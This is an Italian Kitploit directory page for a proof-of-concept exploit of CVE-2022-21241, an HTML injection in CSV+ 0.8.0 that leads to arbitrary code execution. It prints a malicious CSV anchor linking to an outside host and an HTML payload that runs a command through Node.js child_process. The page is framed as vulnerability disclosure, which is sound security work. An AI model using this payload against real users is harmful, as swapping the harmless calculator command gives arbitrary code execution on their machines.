Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
csv-plus_vulnerability — 👻 [PoC] CSV+ 0.8.0 - Esecuzione di codice arbitrario (CVE-2022-21241) | Kitploit
Strumenti/GitHubGitHub/nanaao/csv-plus_vulnerability
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - Esecuzione di codice arbitrario (CVE-2022-21241)

Vedi Repository
54 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

csv-plus_vulnerability

👻 Vulnerabilità di esecuzione arbitraria di codice in 2 clic.

PoC.gif

CVE-2022-21241

⚠
Questo PoC è stato creato per avvisare gli utenti e indagare sulle vulnerabilità nel proprio CSV+, ed è vietato utilizzarlo per attacchi.

Vulnerabilità

Le seguenti versioni sono vulnerabili.

  • CSV+ <= 0.8.0

Gli attaccanti possono eseguire codice arbitrario utilizzando la funzionalità Node.js. Metteranno il codice js dannoso su un sito e lo collegheranno tramite a-tags sfruttando la vulnerabilità di HTML injection in CSV+.

PoC

scenario.png

File csv dannoso

root@kitploit:~
<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html è un link temporaneo.

File html dannoso (calc)

root@kitploit:~
<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
Scarica lo strumento